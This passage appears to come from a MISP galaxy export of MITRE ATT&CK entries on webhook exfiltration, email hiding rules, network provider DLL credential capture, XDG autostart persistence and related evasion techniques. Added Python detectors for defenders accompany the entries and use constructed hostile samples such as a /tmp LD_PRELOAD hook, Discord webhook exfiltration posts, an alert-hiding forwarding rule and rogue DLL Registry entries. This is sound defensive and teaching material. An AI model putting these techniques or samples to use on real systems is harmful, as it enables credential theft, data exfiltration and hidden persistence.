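# Constructed samples: an environ block with a hook library hidden in /tmp,
# and a preload file with one entry.
SAMPLE_ENVIRON = (b"PATH=/usr/bin:/bin\0"
                  b"LD_PRELOAD=/tmp/.x/libhook.so:/usr/lib/libselinux.so.1\0"
                  b"HOME=/root\0SHELL=/bin/bash\0")
SAMPLE_LD_SO_PRELOAD = "# added by an installer\n/usr/local/lib/libcustom.so\n"

if __name__ == "__main__":
    print(preload_from_env(parse_environ(SAMPLE_ENVIRON)))
    print(parse_ld_so_preload(SAMPLE_LD_SO_PRELOAD))
    if os.path.isdir("/proc"):
        print(scan_proc(), check_ld_so_preload())
```

Run it as root, since /proc/<pid>/environ of other users' processes is not readable otherwise; a legitimate hit (a profiler, a sandbox shim) will point at a library under a package-managed path, while a hook living in /tmp, /dev/shm or a dot-directory, or any entry at all in /etc/ld.so.preload, is worth pulling for analysis.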

Exfiltration Over Webhook - T1567.004

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)

Access to webhook endpoints is usually over HTTPS, so the exfiltrated content is hidden from network inspection unless TLS is terminated by a proxy. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint belongs to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Webhook - T1567.004"

Table 5763. Table References

Links

https://attack.mitre.org/techniques/T1567/004

https://blog.talosintelligence.com/collab-app-abuse/

https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md

https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

https://www.redhat.com/en/topics/automation/what-is-a-webhook
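Even when the payload is encrypted, the URL shape of a public webhook endpoint is distinctive, and a proxy that logs the request line sees it. The following Python script is an added example, not part of the MISP galaxy or the cited posts: it classifies outbound POST/PUT requests by webhook service and totals bytes per source host. The URL patterns follow the documented public webhook forms of Discord, Slack and webhook.site; the log layout ("epoch client method url bytes-sent") and the lines in SAMPLE_LOG are constructed.

```python
"""Flag outbound POSTs to public webhook endpoints in proxy logs.

Added example; not code from the MISP galaxy or the cited reports. The
patterns cover Discord (discord.com/api/webhooks/<id>/<token>), Slack
(hooks.slack.com/services/T.../B.../...) and webhook.site/<uuid>; extend
WEBHOOK_PATTERNS for whatever services your environment sees.
"""
import re
from collections import defaultdict

WEBHOOK_PATTERNS = {
    "discord": re.compile(r"^https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.I),
    "slack": re.compile(r"^https?://hooks\.slack\.com/services/T\w+/B\w+/", re.I),
    "webhook.site": re.compile(r"^https?://webhook\.site/[0-9a-f-]{36}", re.I),
}
# Constructed log layout: epoch client method url bytes-sent
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<bytes>\d+)$")


def classify(url):
    """Name of the webhook service a URL belongs to, or None."""
    for service, pattern in WEBHOOK_PATTERNS.items():
        if pattern.match(url):
            return service
    return None


def find_webhook_exfil(lines, min_bytes=0):
    """Aggregate POST/PUT traffic to webhook endpoints per client.

    Returns {client: {"requests": n, "bytes": total, "services": {...}}};
    min_bytes lets you drop the tiny status pings legitimate integrations send.
    """
    per_client = defaultdict(lambda: {"requests": 0, "bytes": 0, "services": set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] not in ("POST", "PUT"):
            continue
        service = classify(m["url"])
        sent = int(m["bytes"])
        if service is None or sent < min_bytes:
            continue
        rec = per_client[m["client"]]
        rec["requests"] += 1
        rec["bytes"] += sent
        rec["services"].add(service)
    return dict(per_client)


# Constructed sample: two large POSTs to one Discord webhook from 10.0.0.5,
# a browser GET to Discord (not a webhook), a Slack webhook post and an
# unrelated API call from 10.0.0.7.
SAMPLE_LOG = """\
1700000000.101 10.0.0.5 POST https://discord.com/api/webhooks/1122334455/c0nstructedT0ken 51200
1700000000.202 10.0.0.5 POST https://discord.com/api/webhooks/1122334455/c0nstructedT0ken 49152
1700000000.303 10.0.0.9 GET https://discord.com/channels/@me 1024
1700000000.404 10.0.0.7 POST https://hooks.slack.com/services/T0AAAAAAA/B0BBBBBBB/cccccccccccc 2048
1700000000.505 10.0.0.7 POST https://api.example.com/v1/submit 4096
"""

if __name__ == "__main__":
    for client, rec in find_webhook_exfil(SAMPLE_LOG.splitlines()).items():
        print(client, rec["requests"], "requests,", rec["bytes"], "bytes ->", sorted(rec["services"]))
```

CI runners and chat-ops hosts post to these endpoints legitimately, so the useful alert is not "any webhook POST" but a new source host, a new webhook id, or a volume well above that host's baseline; on a proxy that does not terminate TLS you still get the hostname from SNI, and the path-level patterns then collapse to the host part.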

Email Hiding Rules - T1564.008

Adversaries may use email rules to hide inbound emails in a compromised user’s mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

Adversaries may utilize email rules within a compromised user’s mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair or delay the detection that would have occurred had the email content been seen promptly by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines.(Citation: Microsoft Cloud App Security)

In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).

The tag is: misp-galaxy:mitre-attack-pattern="Email Hiding Rules - T1564.008"

Table 5764. Table References

Links

https://attack.mitre.org/techniques/T1564/008

https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps

https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac

https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154

https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
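The keyword, folder and action combinations described above are easy to score once the rules are exported. The following Python script is an added example, not code from the MISP galaxy or Microsoft's documentation: each rule is a dict whose keys mirror the Get-InboxRule/New-InboxRule parameter names (SubjectOrBodyContainsWords, SubjectContainsWords, MoveToFolder, DeleteMessage, MarkAsRead, ForwardTo, RedirectTo, StopProcessingRules), which is what Get-InboxRule piped to ConvertTo-Json produces. The keyword list, folder names and weights are assumptions to tune; SAMPLE_RULES is constructed.

```python
"""Score Exchange inbox rules for mail-hiding behaviour.

Added example; not code from the MISP galaxy or Microsoft. Weights and word
lists are assumptions: start from them, then tune against your own tenant.
"""
import re

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
SUSPICIOUS_WORDS = {"malware", "suspicious", "phish", "hack", "virus", "security",
                    "alert", "password", "invoice", "wire", "payment"}
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "junk email", "deleted items", "archive"}


def _items(value):
    """Normalise None, a string or a list of strings to a list of stripped strings."""
    if not value:
        return []
    if isinstance(value, str):
        value = [value]
    return [v.strip() for v in value if v and v.strip()]


def score_rule(rule, internal_domains=frozenset()):
    """Return (score, reasons); higher means more likely to be hiding mail."""
    if not rule.get("Enabled", True):
        return 0, ["disabled"]
    score, reasons = 0, []
    words = {w.lower() for key in ("SubjectOrBodyContainsWords", "SubjectContainsWords",
                                   "BodyContainsWords") for w in _items(rule.get(key))}
    keywords = sorted(w for w in words if any(s in w for s in SUSPICIOUS_WORDS))
    if keywords:
        score += 2
        reasons.append(f"filters on {keywords}")
    if rule.get("DeleteMessage"):
        score += 3
        reasons.append("deletes matching mail")
    # Get-InboxRule renders the folder as 'mailbox:\Folder'; keep the leaf name
    folder = (rule.get("MoveToFolder") or "").rsplit("\\", 1)[-1].strip().lower()
    if folder in HIDING_FOLDERS:
        score += 2
        reasons.append(f"moves to rarely viewed folder '{folder}'")
    if rule.get("MarkAsRead"):
        score += 1
        reasons.append("marks as read")
    targets = " ".join(_items(rule.get("ForwardTo")) + _items(rule.get("RedirectTo")))
    external = sorted({a for a in ADDR_RE.findall(targets)
                       if a.rsplit("@", 1)[1].lower() not in internal_domains})
    if external:
        score += 3
        reasons.append(f"forwards/redirects externally to {external}")
    if rule.get("StopProcessingRules"):
        score += 1
        reasons.append("stops later rules")
    if len((rule.get("Name") or "").strip()) <= 2:  # '.' or ',' style names
        score += 2
        reasons.append("near-empty rule name")
    return score, reasons


def audit_rules(rules, internal_domains=frozenset(), threshold=4):
    """Return [(name, score, reasons)] for rules at or above threshold, highest first."""
    scored = [(r.get("Name", ""), *score_rule(r, internal_domains)) for r in rules]
    return sorted((s for s in scored if s[1] >= threshold), key=lambda s: -s[1])


# Constructed sample: a classic alert-hiding rule, a BEC-style invoice rule
# with external forwarding, and a benign newsletter rule.
SAMPLE_RULES = [
    {"Name": ".", "Enabled": True,
     "SubjectOrBodyContainsWords": ["phish", "suspicious", "hacked", "malware"],
     "MoveToFolder": "\\RSS Subscriptions", "MarkAsRead": True, "StopProcessingRules": True},
    {"Name": "Invoices", "Enabled": True, "SubjectContainsWords": ["invoice", "wire transfer"],
     "DeleteMessage": True, "ForwardTo": ["ops-finance@example-mail.net"]},
    {"Name": "Newsletter cleanup", "Enabled": True,
     "FromAddressContainsWords": ["newsletter@"], "MoveToFolder": "\\Newsletters"},
]

if __name__ == "__main__":
    for name, score, reasons in audit_rules(SAMPLE_RULES, internal_domains={"example.com"}):
        print(f"{score:2} {name!r}: {'; '.join(reasons)}")
```

Organization-wide transport rules (Get-TransportRule) use different property names and are not scored here; review them separately, and pair the rule audit with the mailbox audit log, since the creation event (New-InboxRule, UpdateInboxRules) is the earlier and more reliable signal.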

Revert Cloud Instance - T1578.004

An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004"

Table 5765. Table References

Links

https://attack.mitre.org/techniques/T1578/004

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Network Provider DLL - T1556.008

Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local mpnotify.exe process via RPC. The mpnotify.exe process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify)

Adversaries can configure a malicious network provider DLL to receive credentials from mpnotify.exe.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the NPLogonNotify() function.(Citation: NPLogonNotify)

Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)

The tag is: misp-galaxy:mitre-attack-pattern="Network Provider DLL - T1556.008"

Table 5766. Table References

Links

https://attack.mitre.org/techniques/T1556/008

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify

https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api

https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy

https://www.youtube.com/watch?v=ggY3srD9dYs
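Security Support Providers (T1547.005), Netsh helper DLLs (T1546.007) and network provider DLLs (T1556.008) are all DLL load points driven by Registry values, so one allowlist audit covers all three. The following Python script is an added example, not code from the MISP galaxy, Graeber's SSP analysis or NPPSpy. The Security Packages and Netsh keys are the ones named above; the network provider locations (Control\NetworkProvider\Order\ProviderOrder, and ProviderPath under each Services\<name>\NetworkProvider key) are from Microsoft's Network Provider API documentation. The allowlists are assumed starting points from a default Windows 10 build and should be regenerated from your own golden image; the sample data at the bottom is constructed so the audit runs offline on any OS, and read_live() pulls the real values on Windows.

```python
"""Allowlist audit of three Registry-backed DLL load points.

Added example; not code from the MISP galaxy or the cited research. Checks
the Security Packages values (SSPs), the Netsh helper list and the Network
Provider order. KNOWN_* sets are assumptions: rebuild them from a golden image.
"""
import re

try:
    import winreg  # only exists on Windows; live collection is optional
except ImportError:
    winreg = None

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
OSCONFIG_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa\OSConfig"
NETSH_KEY = r"SOFTWARE\Microsoft\Netsh"
NP_ORDER_KEY = r"SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"
SERVICES_KEY = r"SYSTEM\CurrentControlSet\Services"

KNOWN_SSPS = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "cloudap"}
KNOWN_NETSH = {"authfwcfg.dll", "dhcpcmonitor.dll", "dot3cfg.dll", "fwcfg.dll",
               "hnetmon.dll", "ifmon.dll", "netiohlp.dll", "nettrace.dll",
               "nshhttp.dll", "nshipsec.dll", "nshwfp.dll", "p2pnetsh.dll",
               "peerdistsh.dll", "rasmontr.dll", "rpcnsh.dll", "wcnnetsh.dll",
               "whhelper.dll", "wlancfg.dll", "wshelper.dll", "wwancfg.dll"}
KNOWN_PROVIDERS = {"LanmanWorkstation", "RDPNP", "webclient"}
SYSTEM32_DLL = re.compile(r"^(%systemroot%|c:\\windows)\\system32\\[^\\]+\.dll$", re.I)


def outside_system32(path):
    """True for a value carrying a directory that is not System32\\<name>.dll.

    Default entries are bare file names resolved from System32 by the loader,
    so only values with directory components are judged here."""
    p = path.strip().strip('"')
    return ("\\" in p or "/" in p) and not SYSTEM32_DLL.match(p)


def audit_ssps(packages, location):
    """packages: the REG_MULTI_SZ list from a 'Security Packages' value."""
    return [(location, p.strip(), "unexpected security package")
            for p in packages if p.strip() and p.strip().lower() not in KNOWN_SSPS]


def audit_netsh(helpers):
    """helpers: {value name: DLL} as stored under HKLM\\SOFTWARE\\Microsoft\\Netsh."""
    findings = []
    for name, dll in helpers.items():
        base = dll.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if outside_system32(dll):
            findings.append((f"Netsh\\{name}", dll, "helper DLL outside System32"))
        elif base not in KNOWN_NETSH:
            findings.append((f"Netsh\\{name}", dll, "unexpected helper DLL"))
    return findings


def audit_providers(provider_order, provider_paths):
    """provider_order: comma-separated ProviderOrder; provider_paths: {name: ProviderPath}."""
    findings = []
    for name in (n.strip() for n in provider_order.split(",") if n.strip()):
        path = provider_paths.get(name, "")
        if name not in KNOWN_PROVIDERS:
            findings.append((f"NetworkProvider\\{name}", path, "unexpected network provider"))
        elif outside_system32(path):
            findings.append((f"NetworkProvider\\{name}", path, "provider DLL outside System32"))
    return findings


def audit_all(ssp, ssp_osconfig, netsh, provider_order, provider_paths):
    return (audit_ssps(ssp, "Lsa\\Security Packages")
            + audit_ssps(ssp_osconfig, "Lsa\\OSConfig\\Security Packages")
            + audit_netsh(netsh)
            + audit_providers(provider_order, provider_paths))


def _value(subkey, name):
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as k:
        return winreg.QueryValueEx(k, name)[0]


def read_live():
    """Collect the real values on a Windows host (requires winreg)."""
    if winreg is None:
        raise RuntimeError("winreg unavailable: not a Windows host")
    netsh, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, NETSH_KEY) as k:
        while True:
            try:
                name, data, _ = winreg.EnumValue(k, i)
            except OSError:
                break
            netsh[name], i = data, i + 1
    order = _value(NP_ORDER_KEY, "ProviderOrder")
    paths = {}
    for name in order.split(","):
        try:
            paths[name] = _value(SERVICES_KEY + "\\" + name + "\\NetworkProvider", "ProviderPath")
        except OSError:
            paths[name] = ""
    return (_value(LSA_KEY, "Security Packages"), _value(OSCONFIG_KEY, "Security Packages"),
            netsh, order, paths)


# Constructed sample data: one rogue entry at each load point.
SAMPLE_SSP = ["kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "evilssp"]
SAMPLE_NETSH = {"ifmon": "ifmon.dll", "fwcfg": "fwcfg.dll",
                "updatehlp": r"C:\Users\Public\updatehlp.dll"}
SAMPLE_ORDER = "RDPNP,LanmanWorkstation,webclient,logonhlp"
SAMPLE_PATHS = {"RDPNP": r"%SystemRoot%\System32\drprov.dll",
                "LanmanWorkstation": r"%SystemRoot%\System32\ntlanman.dll",
                "webclient": r"%SystemRoot%\System32\davclnt.dll",
                "logonhlp": r"C:\ProgramData\logonhlp.dll"}

if __name__ == "__main__":
    data = read_live() if winreg else (SAMPLE_SSP, SAMPLE_SSP, SAMPLE_NETSH, SAMPLE_ORDER, SAMPLE_PATHS)
    for location, value, reason in audit_all(*data):
        print(f"{location:38} {value:42} {reason}")
```

A clean allowlist diff is necessary but not sufficient: an attacker can overwrite a legitimately named DLL in place, so pair this with signature and hash checks on the files the entries resolve to, and remember that an SSP added through AddSecurityPackage is live in LSASS immediately even though the Registry only reflects it on the next boot.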

Spoof Security Alerting - T1562.011

Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.

Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.

For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)

The tag is: misp-galaxy:mitre-attack-pattern="Spoof Security Alerting - T1562.011"

Table 5767. Table References

Links

https://attack.mitre.org/techniques/T1562/011

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

Ignore Process Interrupts - T1564.011

Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.

Adversaries may invoke processes using <code>nohup</code>, [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>-ErrorAction SilentlyContinue</code>, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.

Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.

The tag is: misp-galaxy:mitre-attack-pattern="Ignore Process Interrupts - T1564.011"

Table 5768. Table References

Links

https://attack.mitre.org/techniques/T1564/011

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference

https://linux.die.net/man/1/nohup

https://man7.org/linux/man-pages/man7/signal.7.html
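On Linux the signal disposition that nohup arranges is visible after the fact: the kernel exposes each process's ignored-signal set as a hex bitmask in the SigIgn line of /proc/<pid>/status, where bit (n-1) set means signal n is ignored. The following Python script is an added example, not code from the MISP galaxy or the cited man pages; it decodes that mask and, combined with a parent PID of 1 (the launching shell has exited), surfaces long-lived processes that will shrug off a logoff. The signal numbers are the Linux x86/ARM values and SAMPLE_STATUS is constructed.

```python
"""Find processes that ignore SIGHUP, the signal nohup shields against.

Added example; not from the MISP galaxy or the cited man pages. assess()
decodes the SigIgn mask from /proc/<pid>/status; scan() applies it to every
readable process on a live Linux host.
"""
import os
from pathlib import Path

SIGNALS = {"SIGHUP": 1, "SIGINT": 2, "SIGQUIT": 3, "SIGTERM": 15}  # Linux x86/ARM numbering


def parse_status(text):
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def ignored_signals(sigign_hex):
    """Names of watched signals whose bit is set in a SigIgn mask."""
    mask = int(sigign_hex, 16)
    return [name for name, num in SIGNALS.items() if mask & (1 << (num - 1))]


def assess(status_text):
    """Summarise one process: which watched signals it ignores and whether it is orphaned."""
    f = parse_status(status_text)
    ignored = ignored_signals(f.get("SigIgn", "0"))
    return {
        "name": f.get("Name"),
        "pid": int(f.get("Pid", 0)),
        "ppid": int(f.get("PPid", 0)),
        "ignored": ignored,
        "hup_immune": "SIGHUP" in ignored,
        "orphaned": f.get("PPid") == "1",  # reparented to init: the launching shell exited
    }


def scan(proc_root="/proc"):
    """Live scan: every process that ignores SIGHUP, with its parent and cmdline."""
    hits = []
    for entry in os.scandir(proc_root):
        if not entry.name.isdigit():
            continue
        try:
            result = assess(Path(entry.path, "status").read_text())
            raw = Path(entry.path, "cmdline").read_bytes()
            result["cmdline"] = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited or is not readable with our privileges
        if result["hup_immune"]:
            hits.append(result)
    return hits


# Constructed sample: a process named 'updater', reparented to PID 1, that
# ignores SIGHUP (bit 0) and SIGTERM (bit 14): mask 0x4001.
SAMPLE_STATUS = """\
Name:\tupdater
State:\tS (sleeping)
Pid:\t4242
PPid:\t1
SigPnd:\t0000000000000000
SigBlk:\t0000000000000000
SigIgn:\t0000000000004001
SigCgt:\t0000000180000000
"""

if __name__ == "__main__":
    print(assess(SAMPLE_STATUS))
    if os.path.isdir("/proc"):
        for h in scan():
            print(h["pid"], h["ppid"], h["name"], h["ignored"], h["cmdline"][:60])
```

Daemons managed by an init system legitimately ignore SIGHUP, so filter on processes whose cmdline or exe path sits outside package-managed locations or whose session leader has gone; SIGKILL and SIGSTOP cannot be ignored, which is why a process found this way is still terminable with kill -9.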

XDG Autostart Entries - T1547.013

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)

The tag is: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013"

Table 5769. Table References

Links

https://attack.mitre.org/techniques/T1547/013

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html

https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html
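Both autostart directories named above hold plain .desktop files, so the Exec directive can be parsed and judged without running anything. The following Python script is an added example, not code from the MISP galaxy, the freedesktop specifications or the Red Canary write-up: it parses the [Desktop Entry] group of each file in /etc/xdg/autostart and ~/.config/autostart and flags entries whose Exec runs from a world-writable or non-standard location, from a hidden directory, or as an interpreter one-liner. Entries with Hidden=true are skipped because the specification treats them as deleted. The prefix lists are assumptions; the sample entries are constructed.

```python
"""Audit XDG autostart entries for suspicious Exec targets.

Added example; not code from the MISP galaxy or the cited sources. The
heuristics in STANDARD_PREFIXES, WRITABLE_DIRS and INTERPRETERS are
assumptions; tune them to the distribution you run.
"""
import configparser
import os
import shlex
from pathlib import Path

STANDARD_PREFIXES = ("/usr/", "/opt/", "/snap/", "/bin/", "/sbin/", "/lib/")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
AUTOSTART_DIRS = ("/etc/xdg/autostart", os.path.expanduser("~/.config/autostart"))


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, or None if the group is missing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # desktop-file keys are case-sensitive
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return None
    return dict(cp.items("Desktop Entry"))


def assess_entry(entry):
    """List of reasons an autostart entry deserves attention (empty if none)."""
    reasons = []
    if entry.get("Hidden", "").lower() == "true":
        return reasons  # Hidden=true means 'deleted': the launcher ignores it
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    if not argv:
        return reasons
    prog = argv[0]
    if prog.startswith(WRITABLE_DIRS):
        reasons.append(f"Exec runs from a world-writable directory: {prog}")
    elif prog.startswith("/") and not prog.startswith(STANDARD_PREFIXES):
        reasons.append(f"Exec outside standard prefixes: {prog}")
    if "/." in prog and "/.local/" not in prog:
        reasons.append(f"Exec path contains a hidden directory: {prog}")
    if os.path.basename(prog) in INTERPRETERS and any(a in ("-c", "-e") for a in argv[1:]):
        reasons.append("Exec is an interpreter one-liner")
    if any(a.startswith(WRITABLE_DIRS) for a in argv[1:]):
        reasons.append("Exec arguments reference a world-writable directory")
    if reasons and entry.get("NoDisplay", "").lower() == "true":
        reasons.append("NoDisplay=true keeps it out of autostart UIs")
    return reasons


def scan(dirs=AUTOSTART_DIRS):
    """Live scan of the autostart directories; returns [(path, Name, reasons)]."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for path in sorted(Path(d).glob("*.desktop")):
            try:
                entry = parse_desktop(path.read_text(errors="replace"))
            except (OSError, configparser.Error):
                continue
            reasons = assess_entry(entry) if entry else []
            if reasons:
                findings.append((str(path), entry.get("Name"), reasons))
    return findings


# Constructed samples: a benign system entry, a masquerading entry in a hidden
# directory, and a shell one-liner launching from /tmp.
SAMPLE_LEGIT = """\
[Desktop Entry]
Type=Application
Name=Print Queue Applet
Exec=/usr/bin/system-config-printer-applet
NoDisplay=true
"""
SAMPLE_SUSPECT = """\
[Desktop Entry]
Type=Application
Name=GNOME Settings Daemon
Exec=/home/user/.cache/.gsd/gsd-updater --daemon
NoDisplay=true
X-GNOME-Autostart-enabled=true
"""
SAMPLE_ONELINER = """\
[Desktop Entry]
Type=Application
Name=Update
Exec=sh -c "/tmp/.u/run"
"""

if __name__ == "__main__":
    for sample in (SAMPLE_LEGIT, SAMPLE_SUSPECT, SAMPLE_ONELINER):
        entry = parse_desktop(sample)
        print(entry["Name"], "->", assess_entry(entry) or "ok")
    for path, name, reasons in scan():
        print(path, name, reasons)
```

A user-level entry that copies the Name of a system component while its Exec lives under the home directory is the masquerading case from the text; comparing each ~/.config/autostart file's Name against the Exec of the same-named file in /etc/xdg/autostart catches it directly, and ~/.local/bin is excluded from the hidden-directory rule because many legitimate user installs live there.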

